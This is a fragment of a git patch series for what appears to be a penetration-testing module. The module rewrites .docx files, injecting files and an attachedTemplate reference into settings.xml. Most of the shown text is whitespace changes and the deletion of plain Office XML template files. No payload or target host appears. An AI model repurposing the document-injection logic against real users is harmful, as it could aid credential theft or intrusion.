docx.add_file(file.sub(dataDir,''), File.read(file)) + docx.add_file(file.sub(dataDir,''), File.read(file)) end end #add on-the-fly created documents vprint_status("Adding injected files") Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) + docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) end end #add the otherwise skipped "hidden" file @@ -110,11 +110,11 @@ def makeNewFile cleanupTmp(tmpDir) return nil end - + cleanupTmp(tmpDir) return 0 end - + #cleaning up of temporary files. If it fails we say so, but continue anyway def cleanupTmp(dir) begin 
@@ -140,10 +140,10 @@ def manipulateFile #lets extract our docx if unzipDocx(tmpDir).nil? return nil - end + end fileContent = File.read("#{tmpDir}/word/settings.xml") - + if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") @@ -215,7 +215,7 @@ def zipDocx(tmpDir) vprint_status("Adding files from #{tmpDir}") Dir["#{tmpDir}/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub(tmpDir,''), File.read(file)) + docx.add_file(file.sub(tmpDir,''), File.read(file)) end end #add the otherwise skipped "hidden" file From 3b528d7f6d13d530b7f66d8d8839ba33900af9fe Mon Sep 17 00:00:00 2001 
From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 14:00:13 +0100 Subject: [PATCH 261/421] removed data files from docx --- modules/auxiliary/docx/sourcedoc/[Content_Types].xml | 2 -- modules/auxiliary/docx/sourcedoc/_rels/.rels | 2 -- modules/auxiliary/docx/sourcedoc/docProps/app.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels | 2 -- modules/auxiliary/docx/sourcedoc/word/document.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/fontTable.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/settings.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/styles.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml | 2 -- modules/auxiliary/docx/sourcedoc/word/webSettings.xml | 2 -- 10 files changed, 20 deletions(-) delete mode 100644 modules/auxiliary/docx/sourcedoc/[Content_Types].xml delete mode 100644 modules/auxiliary/docx/sourcedoc/_rels/.rels delete mode 100644 modules/auxiliary/docx/sourcedoc/docProps/app.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels delete mode 100644 modules/auxiliary/docx/sourcedoc/word/document.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/fontTable.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/settings.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/styles.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml delete mode 100644 modules/auxiliary/docx/sourcedoc/word/webSettings.xml diff --git a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml deleted file mode 100644 index 39a9cb897f0e..000000000000 --- a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/_rels/.rels b/modules/auxiliary/docx/sourcedoc/_rels/.rels deleted file mode 100644 index fdd8c4f37126..000000000000 --- a/modules/auxiliary/docx/sourcedoc/_rels/.rels +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/docProps/app.xml b/modules/auxiliary/docx/sourcedoc/docProps/app.xml deleted file mode 100644 index 1f971257721b..000000000000 --- a/modules/auxiliary/docx/sourcedoc/docProps/app.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>hoi.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels deleted file mode 100644 index 0079d06931a7..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/document.xml b/modules/auxiliary/docx/sourcedoc/word/document.xml deleted file mode 100644 index 6e291134c2fa..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/document.xml +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t>hoi</w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml deleted file mode 100644 index 20e9a398fef8..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/settings.xml b/modules/auxiliary/docx/sourcedoc/word/settings.xml deleted file mode 100644 index 4692c237a851..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/settings.xml +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" 
w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/styles.xml b/modules/auxiliary/docx/sourcedoc/word/styles.xml deleted file mode 100644 index 4a084626fc28..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/styles.xml +++ /dev/null 
@@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" 
w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" 
w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException 
w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" 
w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml deleted file mode 100644 index a06c80529b6c..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml +++ /dev/null 
